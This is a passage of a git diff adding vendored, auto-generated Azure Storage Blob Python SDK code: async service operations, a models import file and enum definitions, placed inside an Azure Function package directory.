+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListContainersSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListContainersSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListContainersSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_containers_segment_request( + url=self._config.url, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_containers_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('ListContainersSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_containers_segment.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_user_delegation_key( + self, + key_info: "_models.KeyInfo", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.UserDelegationKey": + """Retrieves a user delegation key for the Blob service. This is only a valid operation when using + bearer token authentication. + + :param key_info: Key information. + :type key_info: ~azure.storage.blob.models.KeyInfo + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "userdelegationkey". Note that overriding this default + value may result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: UserDelegationKey, or the result of cls(response) + :rtype: ~azure.storage.blob.models.UserDelegationKey + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.UserDelegationKey"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(key_info, 'KeyInfo', is_xml=True) + + request = build_get_user_delegation_key_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_user_delegation_key.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('UserDelegationKey', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_user_delegation_key.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + response_headers['x-ms-is-hns-enabled']=self._deserialize('bool', response.headers.get('x-ms-is-hns-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def submit_batch( + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> IO: + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def filter_blobs( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + where: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + **kwargs: Any + ) -> "_models.FilterBlobSegment": + """The Filter Blobs operation enables callers to list blobs across all containers whose tags match + a given search expression. Filter blobs searches across all containers within a storage + account but can be scoped within the expression to a single container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. 
The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py new file mode 100644 index 0000000..7920d76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py @@ -0,0 +1,221 @@ +# coding=utf-8 +# 
-------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +try: + from ._models_py3 import AccessPolicy + from ._models_py3 import AppendPositionAccessConditions + from ._models_py3 import ArrowConfiguration + from ._models_py3 import ArrowField + from ._models_py3 import BlobFlatListSegment + from ._models_py3 import BlobHTTPHeaders + from ._models_py3 import BlobHierarchyListSegment + from ._models_py3 import BlobItemInternal + from ._models_py3 import BlobMetadata + from ._models_py3 import BlobName + from ._models_py3 import BlobPrefix + from ._models_py3 import BlobPropertiesInternal + from ._models_py3 import BlobTag + from ._models_py3 import BlobTags + from ._models_py3 import Block + from ._models_py3 import BlockList + from ._models_py3 import BlockLookupList + from ._models_py3 import ClearRange + from ._models_py3 import ContainerCpkScopeInfo + from ._models_py3 import ContainerItem + from ._models_py3 import ContainerProperties + from ._models_py3 import CorsRule + from ._models_py3 import CpkInfo + from ._models_py3 import CpkScopeInfo + from ._models_py3 import DelimitedTextConfiguration + from ._models_py3 import FilterBlobItem + from ._models_py3 import FilterBlobSegment + from ._models_py3 import GeoReplication + from ._models_py3 import JsonTextConfiguration + from ._models_py3 import KeyInfo + from ._models_py3 import LeaseAccessConditions + from ._models_py3 import ListBlobsFlatSegmentResponse + from ._models_py3 import ListBlobsHierarchySegmentResponse + from ._models_py3 import ListContainersSegmentResponse + from ._models_py3 import Logging + from ._models_py3 import Metrics + from ._models_py3 import ModifiedAccessConditions + from ._models_py3 import PageList + from ._models_py3 import PageRange + from ._models_py3 import QueryFormat + from ._models_py3 import QueryRequest + from ._models_py3 import QuerySerialization + from ._models_py3 import RetentionPolicy + from ._models_py3 import SequenceNumberAccessConditions + from ._models_py3 import SignedIdentifier + from ._models_py3 import SourceModifiedAccessConditions + from ._models_py3 import StaticWebsite + from ._models_py3 import StorageError + from ._models_py3 import StorageServiceProperties + from ._models_py3 import StorageServiceStats + from ._models_py3 import UserDelegationKey +except (SyntaxError, ImportError): + from ._models import AccessPolicy # type: ignore + from ._models import AppendPositionAccessConditions # type: ignore + from ._models import ArrowConfiguration # type: ignore + from ._models import ArrowField # type: ignore + from ._models import BlobFlatListSegment # type: ignore + from ._models import BlobHTTPHeaders # type: ignore + from ._models import BlobHierarchyListSegment # type: ignore + from ._models import BlobItemInternal # type: ignore + from ._models import BlobMetadata # type: ignore + from ._models import BlobName # type: ignore + from ._models import BlobPrefix # type: ignore + from ._models import BlobPropertiesInternal # type: ignore + from ._models import BlobTag # type: ignore + from ._models import BlobTags # type: ignore + from ._models import Block # type: ignore + from 
._models import BlockList # type: ignore + from ._models import BlockLookupList # type: ignore + from ._models import ClearRange # type: ignore + from ._models import ContainerCpkScopeInfo # type: ignore + from ._models import ContainerItem # type: ignore + from ._models import ContainerProperties # type: ignore + from ._models import CorsRule # type: ignore + from ._models import CpkInfo # type: ignore + from ._models import CpkScopeInfo # type: ignore + from ._models import DelimitedTextConfiguration # type: ignore + from ._models import FilterBlobItem # type: ignore + from ._models import FilterBlobSegment # type: ignore + from ._models import GeoReplication # type: ignore + from ._models import JsonTextConfiguration # type: ignore + from ._models import KeyInfo # type: ignore + from ._models import LeaseAccessConditions # type: ignore + from ._models import ListBlobsFlatSegmentResponse # type: ignore + from ._models import ListBlobsHierarchySegmentResponse # type: ignore + from ._models import ListContainersSegmentResponse # type: ignore + from ._models import Logging # type: ignore + from ._models import Metrics # type: ignore + from ._models import ModifiedAccessConditions # type: ignore + from ._models import PageList # type: ignore + from ._models import PageRange # type: ignore + from ._models import QueryFormat # type: ignore + from ._models import QueryRequest # type: ignore + from ._models import QuerySerialization # type: ignore + from ._models import RetentionPolicy # type: ignore + from ._models import SequenceNumberAccessConditions # type: ignore + from ._models import SignedIdentifier # type: ignore + from ._models import SourceModifiedAccessConditions # type: ignore + from ._models import StaticWebsite # type: ignore + from ._models import StorageError # type: ignore + from ._models import StorageServiceProperties # type: ignore + from ._models import StorageServiceStats # type: ignore + from ._models import UserDelegationKey # type: ignore + +from ._azure_blob_storage_enums import ( + AccessTier, + AccessTierOptional, + AccessTierRequired, + AccountKind, + ArchiveStatus, + BlobCopySourceTags, + BlobExpiryOptions, + BlobImmutabilityPolicyMode, + BlobType, + BlockListType, + CopyStatusType, + DeleteSnapshotsOptionType, + EncryptionAlgorithmType, + GeoReplicationStatusType, + LeaseDurationType, + LeaseStateType, + LeaseStatusType, + ListBlobsIncludeItem, + ListContainersIncludeType, + PremiumPageBlobAccessTier, + PublicAccessType, + QueryFormatType, + RehydratePriority, + SequenceNumberActionType, + SkuName, + StorageErrorCode, +) + +__all__ = [ + 'AccessPolicy', + 'AppendPositionAccessConditions', + 'ArrowConfiguration', + 'ArrowField', + 'BlobFlatListSegment', + 'BlobHTTPHeaders', + 'BlobHierarchyListSegment', + 'BlobItemInternal', + 'BlobMetadata', + 'BlobName', + 'BlobPrefix', + 'BlobPropertiesInternal', + 'BlobTag', + 'BlobTags', + 'Block', + 'BlockList', + 'BlockLookupList', + 'ClearRange', + 'ContainerCpkScopeInfo', + 'ContainerItem', + 'ContainerProperties', + 'CorsRule', + 'CpkInfo', + 'CpkScopeInfo', + 'DelimitedTextConfiguration', + 'FilterBlobItem', + 'FilterBlobSegment', + 'GeoReplication', + 'JsonTextConfiguration', + 'KeyInfo', + 'LeaseAccessConditions', + 'ListBlobsFlatSegmentResponse', + 'ListBlobsHierarchySegmentResponse', + 'ListContainersSegmentResponse', + 'Logging', + 'Metrics', + 'ModifiedAccessConditions', + 'PageList', + 'PageRange', + 'QueryFormat', + 'QueryRequest', + 'QuerySerialization', + 'RetentionPolicy', + 'SequenceNumberAccessConditions', + 
'SignedIdentifier', + 'SourceModifiedAccessConditions', + 'StaticWebsite', + 'StorageError', + 'StorageServiceProperties', + 'StorageServiceStats', + 'UserDelegationKey', + 'AccessTier', + 'AccessTierOptional', + 'AccessTierRequired', + 'AccountKind', + 'ArchiveStatus', + 'BlobCopySourceTags', + 'BlobExpiryOptions', + 'BlobImmutabilityPolicyMode', + 'BlobType', + 'BlockListType', + 'CopyStatusType', + 'DeleteSnapshotsOptionType', + 'EncryptionAlgorithmType', + 'GeoReplicationStatusType', + 'LeaseDurationType', + 'LeaseStateType', + 'LeaseStatusType', + 'ListBlobsIncludeItem', + 'ListContainersIncludeType', + 'PremiumPageBlobAccessTier', + 'PublicAccessType', + 'QueryFormatType', + 'RehydratePriority', + 'SequenceNumberActionType', + 'SkuName', + 'StorageErrorCode', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d488373 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc new file mode 100644 index 0000000..1001ef4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..a3bfcfb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc new file mode 100644 index 0000000..72afe33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py new file mode 100644 index 0000000..fb1bcd8 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py @@ -0,0 +1,336 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from enum import Enum +from six import with_metaclass +from azure.core import CaseInsensitiveEnumMeta + + +class AccessTier(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccessTierOptional(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccessTierRequired(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccountKind(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + STORAGE = "Storage" + BLOB_STORAGE = "BlobStorage" + STORAGE_V2 = "StorageV2" + FILE_STORAGE = "FileStorage" + BLOCK_BLOB_STORAGE = "BlockBlobStorage" + +class ArchiveStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + REHYDRATE_PENDING_TO_HOT = "rehydrate-pending-to-hot" + REHYDRATE_PENDING_TO_COOL = "rehydrate-pending-to-cool" + +class BlobCopySourceTags(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + REPLACE = "REPLACE" + COPY = "COPY" + +class BlobExpiryOptions(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + NEVER_EXPIRE = "NeverExpire" + RELATIVE_TO_CREATION = "RelativeToCreation" + RELATIVE_TO_NOW = "RelativeToNow" + ABSOLUTE = "Absolute" + +class BlobImmutabilityPolicyMode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + MUTABLE = "Mutable" + UNLOCKED = "Unlocked" + LOCKED = "Locked" + +class BlobType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + BLOCK_BLOB = "BlockBlob" + PAGE_BLOB = "PageBlob" + APPEND_BLOB = "AppendBlob" + +class BlockListType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + COMMITTED = "committed" + UNCOMMITTED = "uncommitted" + ALL = "all" + +class CopyStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + PENDING = "pending" + SUCCESS = "success" + ABORTED = "aborted" + FAILED = "failed" + +class DeleteSnapshotsOptionType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + INCLUDE = "include" + ONLY = "only" + +class EncryptionAlgorithmType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + NONE = "None" + AES256 = "AES256" + +class GeoReplicationStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """The status of the secondary location + """ + + LIVE = "live" + BOOTSTRAP = "bootstrap" + UNAVAILABLE = "unavailable" + +class LeaseDurationType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + INFINITE = "infinite" + 
FIXED = "fixed" + +class LeaseStateType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + AVAILABLE = "available" + LEASED = "leased" + EXPIRED = "expired" + BREAKING = "breaking" + BROKEN = "broken" + +class LeaseStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + LOCKED = "locked" + UNLOCKED = "unlocked" + +class ListBlobsIncludeItem(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + COPY = "copy" + DELETED = "deleted" + METADATA = "metadata" + SNAPSHOTS = "snapshots" + UNCOMMITTEDBLOBS = "uncommittedblobs" + VERSIONS = "versions" + TAGS = "tags" + IMMUTABILITYPOLICY = "immutabilitypolicy" + LEGALHOLD = "legalhold" + DELETEDWITHVERSIONS = "deletedwithversions" + +class ListContainersIncludeType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + METADATA = "metadata" + DELETED = "deleted" + SYSTEM = "system" + +class PremiumPageBlobAccessTier(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + +class PublicAccessType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + CONTAINER = "container" + BLOB = "blob" + +class QueryFormatType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """The quick query format type. + """ + + DELIMITED = "delimited" + JSON = "json" + ARROW = "arrow" + PARQUET = "parquet" + +class RehydratePriority(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """If an object is in rehydrate pending state then this header is returned with priority of + rehydrate. Valid values are High and Standard. + """ + + HIGH = "High" + STANDARD = "Standard" + +class SequenceNumberActionType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + MAX = "max" + UPDATE = "update" + INCREMENT = "increment" + +class SkuName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + STANDARD_LRS = "Standard_LRS" + STANDARD_GRS = "Standard_GRS" + STANDARD_RAGRS = "Standard_RAGRS" + STANDARD_ZRS = "Standard_ZRS" + PREMIUM_LRS = "Premium_LRS" + +class StorageErrorCode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """Error codes returned by the service + """ + + ACCOUNT_ALREADY_EXISTS = "AccountAlreadyExists" + ACCOUNT_BEING_CREATED = "AccountBeingCreated" + ACCOUNT_IS_DISABLED = "AccountIsDisabled" + AUTHENTICATION_FAILED = "AuthenticationFailed" + AUTHORIZATION_FAILURE = "AuthorizationFailure" + CONDITION_HEADERS_NOT_SUPPORTED = "ConditionHeadersNotSupported" + CONDITION_NOT_MET = "ConditionNotMet" + EMPTY_METADATA_KEY = "EmptyMetadataKey" + INSUFFICIENT_ACCOUNT_PERMISSIONS = "InsufficientAccountPermissions" + INTERNAL_ERROR = "InternalError" + INVALID_AUTHENTICATION_INFO = "InvalidAuthenticationInfo" + INVALID_HEADER_VALUE = "InvalidHeaderValue" + INVALID_HTTP_VERB = "InvalidHttpVerb" + INVALID_INPUT = "InvalidInput" + INVALID_MD5 = "InvalidMd5" + INVALID_METADATA = "InvalidMetadata" + INVALID_QUERY_PARAMETER_VALUE = "InvalidQueryParameterValue" + INVALID_RANGE = "InvalidRange" + INVALID_RESOURCE_NAME = "InvalidResourceName" + INVALID_URI = "InvalidUri" + INVALID_XML_DOCUMENT = "InvalidXmlDocument" + INVALID_XML_NODE_VALUE = "InvalidXmlNodeValue" + MD5_MISMATCH = "Md5Mismatch" + METADATA_TOO_LARGE = "MetadataTooLarge" + MISSING_CONTENT_LENGTH_HEADER = "MissingContentLengthHeader" + MISSING_REQUIRED_QUERY_PARAMETER = "MissingRequiredQueryParameter" + MISSING_REQUIRED_HEADER = "MissingRequiredHeader" + MISSING_REQUIRED_XML_NODE = "MissingRequiredXmlNode" + 
